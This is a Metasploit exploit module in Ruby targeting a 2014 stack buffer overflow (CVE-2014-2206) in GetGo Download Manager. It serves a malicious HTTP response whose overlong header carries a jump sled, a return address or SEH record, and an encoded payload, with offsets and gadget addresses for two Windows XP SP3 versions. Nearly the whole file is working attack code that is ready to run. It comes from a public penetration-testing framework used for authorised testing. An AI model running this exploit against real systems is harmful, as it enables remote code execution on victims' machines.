##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetGo Download Manager HTTP Response Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        GetGo Download Manager version 5.3.0.2712 earlier, caused by an
        overly long HTTP response header.

        By persuading the victim to download a file from a malicious server, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens',  # Vulnerability discovery
          'Gabor Seljan',   # Metasploit module for v4
          'bzyo',           # Metasploit module for v5
          'sinn3r'          # Helping Gabor and bzyo (see #4588 & #9642)
        ],
      'References'     =>
        [
          [ 'EDB', '32132' ],
          [ 'OSVDB', '103910' ],
          [ 'CVE', '2014-2206' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'URIPATH'      => "/shakeitoff.mp3"
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # v5 has no bad chars
          'BadChars'   => "\x00\x0a\x0d"
        },
      'Targets'        =>
        [
          [
            'Automatic', {}
          ],
          [ '4.9.0.1982 on Windows XP SP3',
            {
              'Offset' => 4107,
              'Ret'    => 0x00280b0b  # CALL DWORD PTR SS:[EBP+30]
            }
          ],
          [
            '5.3.0.2712 on Windows XP SP3',
            {
              'Offset'  => 4095,
              # 0:016> u 0x72d11f39
              # msacm32!wodMessage+0xd0f:
              # 72d11f39 5f              pop     edi
              # 72d11f3a 5e              pop     esi
              # 72d11f3b c20400          ret     4
              'Ret'     => 0x72d11f39,
              # 12253 is the same size the python PoC used
              'MaxSize' => 12253
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 09 2014',
      'DefaultTarget'  => 0))
  end

  # This part is from Gabor Seljan
  def exploit_v4(cli, current_taget)
    sploit  = rand_text_alpha(current_taget['Offset'])
    sploit << "\x90\x90\xEB\x06"
    sploit << [current_taget.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")

    resp = create_response(200, sploit)
    resp.body = ""
    cli.send_response(resp)
  end

  # This part is from Auxilus with some help from @_sinn3r
  def exploit_v5(cli, current_taget)
    seh_record = generate_seh_record(current_taget.ret)
    # Minus 4 for the SEH record
    buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
    buffer << seh_record
    buffer << payload.encoded
    buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
    res = create_response(200, buffer)
    cli.send_response(res)
  end

  def on_request_uri(cli, request)
    print_status("#{cli.peerhost} connected")
    current_target = target
    user_agent = request.headers['User-Agent'].to_s

    if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
      print_status('Attempting to exploit against v4')
      current_target = targets[1]
      exploit_v4(cli, current_target)
    elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
      print_status('Attempting to exploit against v5')
      current_target = targets[2]
      exploit_v5(cli, current_target)
    else
      print_error('Sending 404 for unknown user-agent')
      send_not_found(cli)
    end
  end
end
